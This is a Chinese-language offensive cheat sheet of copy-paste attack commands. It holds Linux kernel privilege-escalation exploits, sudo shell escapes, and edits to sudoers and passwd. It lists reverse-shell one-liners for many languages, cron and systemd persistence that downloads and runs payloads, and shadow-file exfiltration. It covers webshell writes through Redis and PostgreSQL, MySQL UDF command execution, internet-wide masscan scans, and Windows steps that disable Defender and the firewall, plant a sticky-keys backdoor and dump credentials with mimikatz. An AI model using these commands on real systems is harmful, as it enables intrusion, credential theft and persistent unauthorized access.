./dcow -s //强制密码"dirtyCowFun"(SHA-512)。在成功执行的情况下,使用该密码执行"su"操作,则可以使用root shell。使用-s选项(建议)
这会影响版本等于或大于2.6.39的Linux内核,Red Hat,Centos和Ubuntu的最新版本受到影响。
$ wget www.tux-planet.fr/public/hack/exploits/kernel/mempodipper.c
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
$ wget https://raw.githubusercontent.com/realtalk/cve-2013-2094/master/semtex.c
$ gcc -O2 semtex.c
$ ./a.out
Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
wget --no-check-certificate https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2692/2.6.18.c
wget --no-check-certificate https://github.com/xpn/ssh-inject/archive/master.zip && unzip master.zip && cd ssh-inject-master //下载解压文件并进入目录
make //编译
ps aux | grep sshd //查看sshd服务进程id
./run.sh xxx //注入id进程获取ssh登陆用户密码
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
(crontab -l;printf "* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"x.x.x.x\",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n")|crontab -
sudo -l 显示当前用户可以无需密码以root身份执行的所有二进制文件

sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;
sudo vim -c '!sh'
sudo nmap --interactive
nmap> !sh
sh-4.1#
注意:nmap --interactive选项在最新的nmap中不可用
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse //没有交互的最新方式
sudo man man
之后输入!sh然后进入
sudo less /etc/hosts
sudo more /etc/hosts
之后输入!sh然后进入
sudo awk 'BEGIN {system("/bin/sh")}'
使用nano编辑器编辑passwd文件。在/etc/passwd中添加此行以将用户添加为root权限。
touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash或无密码touhid::0:0::/root:/bin/bash
sudo nano /etc/passwd
现在切换用户密码是:test
su touhid
首先将靶机的/etc/passwd文件复制到攻击者计算机,修改passwd文件追加这一行touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd
现在切换用户密码是:test
su touhid
注意:如果你想从服务器转储文件,比如root的ssh key,Shadow文件等。
sudo wget --post-file=/etc/shadow 192.168.56.1:8080
攻击者设置监听器:nc –lvp 8080
遗憾的是你无法获得Shell和Cant编辑系统文件。但使用这个你可以查看系统文件。
sudo apache2 -f /etc/shadow
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root //新建文件/tmp/.test,把命令写进/tmp/.test比如"id"
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash -i >& /dev/tcp/x.x.x.x/4444 0>&1"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
export HISTFILE=/dev/null && echo "*/1 * * * * (cd /tmp && curl x.x.x.x/x.txt -o zabbix && chmod +x zabbix && ./zabbix)|sh" | crontab -
crontab -r
或
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash -i >& /dev/tcp/x.x.x.x/4444 0>&1"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF
export HISTFILE=/dev/null && echo "*/1 * * * * (cd /tmp && curl x.x.x.x/x.txt -o zabbix && chmod +x zabbix && ./zabbix)|sh" | crontab -
crontab -r
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
或
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
#
# - https://hacker.house
#
# NOTE(review): defender's summary, so this can be recognised and
# mitigated rather than re-run:
#  - precondition: a setuid Xorg in the version range named above; the
#    write as root is done through the -logfile option.
#  - artifact: /etc/master.passwd is replaced by an X server log; per
#    the reminder at the end, the previous file ends up as
#    /etc/master.passwd.old.
#  - mitigation: update Xorg to a release later than 1.20.2 or remove
#    the setuid bit; detection: an Xorg process started with -logfile
#    pointing under /etc, or an unexpected change of master.passwd.
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
# the -logfile path is the file overwritten as root; the server is
# backgrounded and killed a few seconds later
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -
gcc chocobo_root.c -o chocobo_root -lpthread
./chocobo_root
以下是理论支持内核版本列表:
4.4.0-46-generic #67~14.04.1
4.4.0-47-generic #68~14.04.1
4.2.0-41-generic #48
4.8.0-22-generic #24
4.2.0-34-generic #39
4.2.0-30-generic #36
4.2.0-16-generic #19
4.2.0-17-generic #21
4.2.0-18-generic #22
4.2.0-19-generic #23~14.04.1
4.2.0-21-generic #25~14.04.1
4.2.0-30-generic #36~14.04.1
4.2.0-27-generic #32~14.04.1
4.2.0-36-generic #42
4.4.0-22-generic #40
4.2.0-18-generic #22~14.04.1
4.4.0-34-generic #53
4.2.0-22-generic #27
4.2.0-23-generic #28
4.2.0-25-generic #30
4.4.0-36-generic #55
4.2.0-42-generic #49
4.4.0-31-generic #50
4.4.0-22-generic #40~14.04.1
4.2.0-38-generic #45
4.4.0-45-generic #66
4.2.0-36-generic #42~14.04.1
4.4.0-45-generic #66~14.04.1
4.2.0-22-generic #27~14.04.1
4.2.0-25-generic #30~14.04.1
4.2.0-23-generic #28~14.04.1
4.4.0-46-generic #67
4.4.0-47-generic #68
4.4.0-34-generic #53~14.04.1
4.4.0-36-generic #55~14.04.1
4.4.0-31-generic #50~14.04.1
4.2.0-38-generic #45~14.04.1
4.2.0-35-generic #40
4.4.0-24-generic #43~14.04.1
4.4.0-21-generic #37
4.2.0-34-generic #39~14.04.1
4.4.0-24-generic #43
4.4.0-21-generic #37~14.04.1
4.2.0-41-generic #48~14.04.1
4.8.0-27-generic #29
4.8.0-26-generic #28
4.4.0-38-generic #57
4.4.0-42-generic #62~14.04.1
4.4.0-38-generic #57~14.04.1
4.4.0-49-generic #70
4.4.0-49-generic #70~14.04.1
4.2.0-21-generic #25
4.2.0-19-generic #23
4.2.0-42-generic #49~14.04.1
4.4.0-43-generic #63
4.4.0-28-generic #47
4.4.0-28-generic #47~14.04.1
4.9.0-1-generic #2
4.8.0-28-generic #30
4.2.0-35-generic #40~14.04.1
4.2.0-27-generic #32
4.4.0-42-generic #62
4.4.0-51-generic #72
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
wget https://raw.githubusercontent.com/jas502n/CVE-2019-13272/master/CVE-2019-13272.c
gcc -s CVE-2019-13272.c -o pwned
通过本地权限升级漏洞获得root权限?想要他的密码,但不能破解?你可以尝试ssh snooping ..
#!/bin/bash
# NOTE(review): this loop already requires root (it attaches strace to
# an sshd process and chowns its output to root), so it is a
# post-compromise tool, not a way in. Observable artifacts for a
# defender: a long-running bash loop polling ps, strace attached to an
# sshd process (visible in ps and in ptrace audit events), and
# root-owned output*.log files of mode 600 in the working directory.
# Restricting ptrace (e.g. kernel.yama.ptrace_scope on Linux) and
# alerting on ptrace of sshd are the relevant mitigations.
while true; do
# locate the sshd privilege-separation helper ("priv" in its ps line);
# runs of spaces are squeezed so `awk '{print $1}'` below yields the pid
ps_test=`ps ax|grep sshd|grep -v grep|grep priv|tr -s ' '`
if [ -n "$ps_test" ]
then
# random scratch name for the raw trace, and the result file name
f=$RANDOM
a="output$RANDOM.log"
# attach to that pid and record read() calls only, into $f
strace -e trace=read -p $(echo $ps_test | awk '{print $1}') -o $f
# keep only the reads on fd 6, then discard the raw trace
cat $f | grep 'read(6,' > $a
rm $f
# result is readable by root only
chown root:root $a
chmod 600 $a
else
# nothing to attach to yet: print a dot without newline and poll again
echo -e ".\c"
sleep 0.1
fi
done
sudo -u#-1 id -u
或
sudo -u#4294967295 id -u
perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
while :; do ./lucky0 -q && break; done
sudo -s
利用前提:开了web并且知道路径(如利用phpinfo)
config set dir /home/wwwroot/default/ //设置路径
config set dbfilename redis.php //设置文件名
set webshell "<?php @eval($_POST['chopper']);?>" //写入后门代码
set webshell "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"chopper\"],\"unsafe\");%>" //aspx,注意双引号使用\
set webshell "<%eval request(\"chopper\")%>" //asp,注意双引号使用\
save //保存
python3 redis-rce.py -r 192.168.1.16 -L 192.168.1.107 -f exp.so
RedisDesktopManager连接控制台执行
system.exec "id"
写反弹脚本
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjkvOTk5OSAwPiYx |base64 -d > a
使用数据库获取系统信息
drop table pwn;
create table pwn(t TEXT);
copy pwn from '/etc/passwd';
select *from pwn limit 1 offset 0;
drop table pwn;
使用数据库写文件
drop table pwn;
create table pwn (t TEXT);
insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>');
select * from pwn;
copy pwn(t) to '/tmp/cmd.php';
drop table pwn;
或
copy (select '<?php phpinfo();?>') to '/tmp/1.php';
sudo -u postgres psql
psql -U dbuser -d exampledb -h 127.0.0.1 -p 5432
\password 设置密码。
\q 退出。
\h 查看SQL命令的解释,比如\h select。
\? 查看psql命令列表。
\l 列出所有数据库。
\c [database_name] 连接其他数据库。
\d 列出当前数据库的所有表格。
\d [table_name] 列出某一张表格的结构。
\du 列出所有用户。
\e 打开文本编辑器。
\conninfo 列出当前数据库和连接的信息。
SELECT first_name FROM customer;//查询表指定字段
SELECT id,user,pass FROM customer; //查询表多个指定字段
COPY (select * from users) to '/tmp/users.csv' with csv header; //导出表
漏洞攻击POC:
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
注意:命令中的任何单引号都必须通过双引号来转义它们。比如想执行下面命令:
echo 'hello';
你需要将它放在单引号内,然后用双引号替换所有单引号:
'echo "hello";'
mysqldump -uroot -ptecmint rsyslog> rsyslog.sql //备份单个MySQL数据库
mysqldump -uroot -ptecmint --databases rsyslog syslog> rsyslog_syslog.sql //备份多个MySQL数据库
mysqldump -uroot -ptecmint --all-databases> all-databases.sql //备份所有数据库
mysqldump -uroot -ptecmint --no-data rsyslog> rsyslog_structure.sql //仅备份MySQL数据库结构
mysqldump -uroot -ptecmint --no-create-db --no-create-info rsyslog> rsyslog_data.sql //仅备份MySQL数据库数据
mysqldump -uroot -ptecmint wordpress wp_posts> wordpress_posts.sql //备份单表数据库
mysqldump -uroot -ptecmint wordpress wp_posts wp_comments> wordpress_posts_comments.sql //备份多个数据库表
mysqldump -uroot -ptecmint -C products> products.sql.tgz //tar压缩备份
mysqldump -uroot -ptecmint products | gzip > products.sql.gz //gzip压缩备份
mysqldump -uroot -ptecmint products --skip-lock-tables | gzip > products.sql.gz //gzip压缩备份。如果出现"when using LOCK TABLES",解决办法是加上"--skip-lock-tables"
mysqldump --opt -u root --password=tecmint -h127.0.0.1 products > D:\products.sql //--opt代表激活了Mysqldump命令的quick,add-drop-table,add-locks,extended-insert,lock-tables
mysql -uroot -ptecmint rsyslog <rsyslog.sql //恢复单个MySQL数据库
tar xfzO products.sql.tgz | mysql -uroot -ptecmint products //tar恢复单个MySQL数据库
gunzip <products.sql.gz | mysql -uroot -ptecmint products //gunzip恢复单个MySQL数据库
mysqlimport -uroot -ptecmint rsyslog <rsyslog.sql //如果要还原目标计算机上已存在的数据库,则需要使用mysqlimport命令
show slave status //查看master ip地址
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '' WITH GRANT OPTION; //MYSQL开启外链语句
GRANT ALL PRIVILEGES ON *.* TO 'myuser'@'192.168.1.104' IDENTIFIED BY 'admin123' WITH GRANT OPTION; //MYSQL设置指定IP外链语句
DELETE FROM `mysql`.`user` WHERE `Host`='%' AND `User`='root'; //删除外链
create table test (cmd text);
load data infile "C:/Windows/win.ini" into table test FIELDS TERMINATED BY '\n';
load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
或
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
load data local infile "C:/Windows/win.ini" into table test FIELDS TERMINATED BY '\n';
mysql> show variables like '%plugin%'; 或 select @@plugin_dir;
+---------------+-------------------------+
| Variable_name | Value |
+---------------+-------------------------+
| plugin_dir | /usr/lib64/mysql/plugin |
+---------------+-------------------------+
1 row in set (0.00 sec)
mysql> select * from func; #检查是否已经有人导出过了
mysql> select unhex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into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.01 sec)#需要有/usr/lib64/mysql/plugin/目录的写入权限
mysql> create function sys_eval returns string soname 'mysqludf.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql
|
+--------------------+
1 row in set (0.03 sec)
mysql> select * from func;
+----------+-----+-------------+----------+
| name | ret | dl | type |
+----------+-----+-------------+----------+
| sys_eval | 0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)
mysql> select sys_eval('cd /tmp;wget http://x.x.x.x/xxx.exe;chmod +x xxx.exe;mv xxx.exe zabbix;./zabbix');
+--------------------------------------------------------------------------------------------------------------+
| sys_eval('cd /tmp;wget http://x.x.x.x/xxx.exe;chmod +x xxx.exe;mv xxx.exe zabbix;./zabbix') |
+--------------------------------------------------------------------------------------------------------------+
| |
+--------------------------------------------------------------------------------------------------------------+
1 row in set
mysql> drop function sys_eval;
Query OK, 0 rows affected (0.00 sec)
mysql> select * from func;
Empty set (0.00 sec)
BASH REVERSE SHELL|bash -i >& /dev/tcp/x.x.x.x/1337 0>&1
BASH REVERSE SHELL|0<&196;exec 196<>/dev/tcp/x.x.x.x/1337; sh <&196 >&196 2>&196
PERL REVERSE SHELL|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
PERL REVERSE SHELL WINDOWS|perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
RUBY REVERSE SHELL|ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","1337");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
RUBY REVERSE SHELL|ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
RUBY REVERSE SHELL WINDOWS|ruby -rsocket -e 'c=TCPSocket.new("x.x.x.x","1337");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NETCAT REVERSE SHELL|nc -c /bin/sh x.x.x.x 1337
NETCAT REVERSE SHELL|/bin/sh | nc x.x.x.x 1337
NETCAT REVERSE SHELL|rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 1337 0/tmp/p
PYTHON REVERSE SHELL|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP REVERSE SHELL|php -r '$sock=fsockopen("x.x.x.x",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
TELNET REVERSE SHELL|rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 1337 0/tmp/p
POWERSHELL REVERSE SHELL|powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("x.x.x.x",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
openssl s_server -quiet -key key.pem -cert cert.pem -port 1337 //本地监听
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect x.x.x.x:1337 > /tmp/s; rm /tmp/s //启动反弹shell
(crontab -l;printf "* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"x.x.x.x\",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n")|crontab -
/bin/sh -i
perl -e 'exec "/bin/sh";'
python -c 'import pty; pty.spawn("/bin/bash")'
使用socat
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
A类:10.0.0.0/8 即10.0.0.0-10.255.255.255
B类:172.16.0.0/12 即172.16.0.1-172.31.255.254
C类:192.168.0.0/16 即192.168.0.1-192.168.255.254
扫描一个巨大的网络空间,我们最关心的是效率问题,即时间成本。 在足够迅速的前提下,宁可牺牲掉一些准确性。
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oN 10.txt 10.0.0.0/8 > /dev/null 2>&1
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oN 172.txt 172.16.0.0/12 > /dev/null 2>&1
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oN 192.txt 192.168.0.0/16 > /dev/null 2>&1
或
fping -a -g 10.0.0.0/8 >10.txt
fping -a -g 172.16.0.0/12 >172.txt
fping -a -g 192.168.0.0/16 >192.txt
或
masscan 10.0.0.0/8,172.16.0.0/12,192.168.0.0/16 --ping --max-rate 100000 >all.txt
masscan 0.0.0.0/0 -p443,8443 --max-rate 100000 --heartbleed >443.txt //心脏滴血漏洞扫描
masscan -p80 0.0.0.0/0 --exclude 10.0.0.0/8,172.16.0.0/12,192.168.0.0/16 --max-rate 300000 >all.txt //扫描全网80端口ip段,排除内网ip段(或机房ip段)
或
masscan -p80 0.0.0.0/0 --excludefile blackip.txt --max-rate 300000 >all.txt //扫描全网80端口ip段,blackip.txt填写排除ip地址或ip段每行一个
备注 Windows、Mac或VM没有针对数据包传输进行调整,每秒只能获得大约300,000个数据包,而Linux可以每秒执行1,500,000个数据包。
masscan -p21,22,23,161,389,445,873,1080,1433,1521,2049,2376,3000,3306,3389,3690,4848,5432,6379,7001,7002,8000,8161,8080,9000,9200,9990,11211,27017,50000 --banners --max-rate 100000 10.0.0.0/8,172.16.0.0/12,192.168.0.0/16 > result.txt
21,22,53,80-89,161,389,443,445,873,1080,1098,1099,1352,1443,1194,1723,1433,1521,2049,2222,2376,3000,3306,3389,3690,4848,4899,5000,5432,5900,5984,6379,7001,7002,8000,8001,8291,8443,8080-8089,8161,8808,8888,8899,9080,9090,9200,9300,9999,10443,27017,27018,50000
在gitlab或jenkins的服务器上通常存在id_rsa私钥(实现免密登录)
find / -name id_rsa //查找私钥
ssh -i id_rsa user@xxx //公钥免密登录
type *.txt > all.txt //多个txt文件合并
net user test 1234 /add //添加新用户
net localgroup administrators test /add //添加新用户到管理员组
taskkill /F /IM "cmd.exe" //按名称杀死进程
taskkill /pid xxx -t -f //强制结束pid进程和子进程
wmic process get name,executablepath,processid //查看任务管理器名称,路径,pid
shutdown /r /t 0 //立即重启
shutdown /s /t 0 //立即关机
fsutil fsinfo drives //查找系统上的所有硬盘/存储分区
netsh firewall set opmode disable //关闭Windows防火墙
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f //将管理员的UAC行为设置为"不提示"
netsh Advfirewall set allprofiles state off //关闭防火墙
netsh Advfirewall set allprofiles state on //开启防火墙
netsh Advfirewall show allprofiles //检查防火墙状态
netsh -c interface dump //将当前网络配置导出查看
sc query | more //检查系统所有服务
sc stop cc_cometDaemon.exe //停止服务
sc start cc_cometDaemon.exe //开启服务
sc query cc_cometDaemon.exe //检查停止状态
sc config cc_cometDaemon.exe start=disabled //禁用服务
sc config cc_cometDaemon.exe start=auto //服务自启动
wmic process where Name="xxx.exe" get ProcessId,name,commandline //查询某进程信息.进程id、进程名、执行命令
powershell.exe -command "ls '%cd%\*.*' | foreach-object { $_.LastWriteTime = '01/01/2021 01:01:01'; $_.CreationTime = '02/02/2021 01:01:01'; $_.LastAccessTime = '03/03/2021 01:01:01' }" //windows 命令行修改文件时间戳
C:/WINNT/system32/inetsrv/MetaBase.bin //IIS 5 中,IIS 的配置文件
C:/WINDOWS/system32/inetsrv/MetaBase.xml //IIS 6 中,IIS 的配置文件
C:/WINDOWS/system32/inetsrv/config/applicationHost.config //IIS 7 中,IIS 的配置文件
或
iis6:type %systemroot%\system32\inetsrv\metabase.xml|findstr Path=
iis7/8:type %systemroot%\System32\inetsrv\config\applicationHost.config|findstr physicalPath=
iis7/8: %windir%\system32\inetsrv\appcmd list site //查看网站列表
iis7/8: %windir%\system32\inetsrv\appcmd list sites /state:started //列出开始的站点
iis7/8: %windir%\system32\inetsrv\appcmd list sites /state:stopped //列出停止的站点
type c:\windows\system32\drivers\etc\hosts //查看hosts文件
netsh firewall set icmpsetting 8 //开启外部ping
netsh firewall set icmpsetting 8 disable //禁止外部Ping
ipconfig /displaydns //查看本地DNS缓存
wmic OS get Caption, CSDVersion, OSArchitecture, Version //获取系统版本信息
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct get /format:LIST //查找系统安装的杀毒软件
wmic product get name,version //查看当前安装的程序
net config workstation //查看当前登陆域
cmdkey /list //获取远程桌面连接过的历史账户列表
attrib +h "your_folder_or_file" //隐藏文件夹或文件
attrib +h "d:\demo\*" /s /d
dir /a:h //列出隐藏文件
attrib -s -h "your_hidden_folder_or_file" //取消隐藏文件夹或文件
PowerShell Compress-Archive . filename.zip //压缩当前目录为zip
PowerShell Expand-Archive filename.zip . //解压zip
REG add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f //关闭 Windows Defender 杀毒
REG add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 0 /t REG_DWORD /f //开启 Windows Defender 杀毒
REG add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 //将regedit值设置为1并启动wdigest auth抓取明文密码
REG query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential //查询是否启用wdigest auth抓取明文密码
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "c:\windows\system32\cmd.exe" /d "RUNASADMIN" /f //以管理员权限执行命令
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "c:\windows\system32\cmd.exe" /f //删除以管理员权限执行命令
mstsc /admin /v:192.168.58.129 //突破终端服务器已超过允许的最大连接数
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f //启用RDP访问3389
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber //十六进制转十进制,查看rdp端口
或
tasklist /svc |find "TermService" //查看系统进程TermService服务对应的PID
netstat -ano | findstr pid //查找TermService服务PID对应的端口
或
for /f "tokens=2 delims=x" %a in ('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" ^| find "PortNumber"') do (set /a n=0x%a)
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fSingleSessionPerUser /t REG_DWORD /d 0 /f //设置单用户允许多个RDP会话
REG query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fSingleSessionPerUser //查看是否开单用户允许多个RDP会话
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f //sethc粘键后门后门
ntsd -cq -pn SafeDogGuardCenter.exe //搞死安全狗3.x
for /r c:\ %i in (Newslist*.aspx) do @echo %i //在WINDOWS下命令查找文件
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonPasswords full" exit //获取密码
procdump.exe -accepteula -ma lsass.exe lsass.dmp //32系统转储内存
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //64系统转储内存
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" //通过转储内存文件获取密码
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:remoteserver /ntlm:{NTLM_hash} \"/run:mstsc.exe /restrictedadmin\"" //mimikatz传递哈希
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:remoteserver /aes256:{aes256_hmac} \"/run:mstsc.exe /restrictedadmin\"" //mimikatz传递AES-KEY
PowerShell IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1’) ; Invoke-Mimikatz -DumpCreds //远程加载mimikatz
uname -a //查看内核/操作系统/CPU信息
cat /etc/issue //查看操作系统版本
cat /proc/version //查看系统版本
cat /proc/cpuinfo //查看CPU信息
hostname //查看计算机名
userdel -r user //删除用户并清除home目录
runlevel //查看运行级别
lsusb -tv //列出所有USB设备
env //查看环境变量
updatedb //更新locate的默认数据库增加索引
pinky //当前已登陆用户
sudo -l //当前用户可以以root身份执行的命令
curl ifconfig.me //获取本机外网ip地址
curl https://ip.cn //获取本机外网ip地址
cat /etc/ppp/chap-secrets //获取vpn服务pptp账号密码
strings /usr/sbin/sshd | grep /
strings /usr/sbin/sshd | grep password //查看ssh后门记录路径文件
rpm -qV pam //centos rpm校验已安装pam包是否被修改
cat /etc/psa/.psa.shadow //显示Plesk管理员密码
tail -n 100 error_log //显示该文件的最新100行
tail -f access_log //实时查看该文件更新
pkill -kill -t tty //强制踢掉登录用户tty
cat /etc/network/interfaces //查看网卡信息
pwgen //复杂密码随机生成工具
apt-get install net-tools //debian新版默认没有ifconfig、netstat需要安装net-tools包
ip a //debian新版查看ip命令
apt-get install geany //Geany编辑器
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' //列出所有超级用户帐户
sed -i 's/#Port 22/Port 42318/' /etc/ssh/sshd_config //替换sshd服务端口
cat /etc/shells //有效登录shell的路径名
cat /etc/resolv.conf //显示配置的DNS服务器地址
[space]set +o history //[space] 表示空格。并且由于空格的缘故,该命令本身也不会被记录。
[Space]set -o history //它将环境恢复原状,也就是你完成了你的工作,执行上述命令之后的命令都会出现在历史中。
export ALL_PROXY=socks5://127.0.0.1:1080 //只对当前终端有效,强制命令走socks5代理
grep -r -l -i -I passw / //查找其中包含字符串“ passw”的文件
find /etc/ -readable -type f 2>/dev/null //列出我们可以阅读的配置文件
find /var/log -readable -type f 2>/dev/null //列出我们可以阅读的日志文件
cut -d: -f1 /etc/passwd //获取当前账户列表
7z a -t7z -r -mx=9 xxx.7z dir/ //7z极限压缩
rpm -q --qf "%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH}\n" pam //通过使用rpm 的--qf或 --queryformat选项,可以分别输出这些字段和其他字段pam-1.1.8-9.el7.x86_64
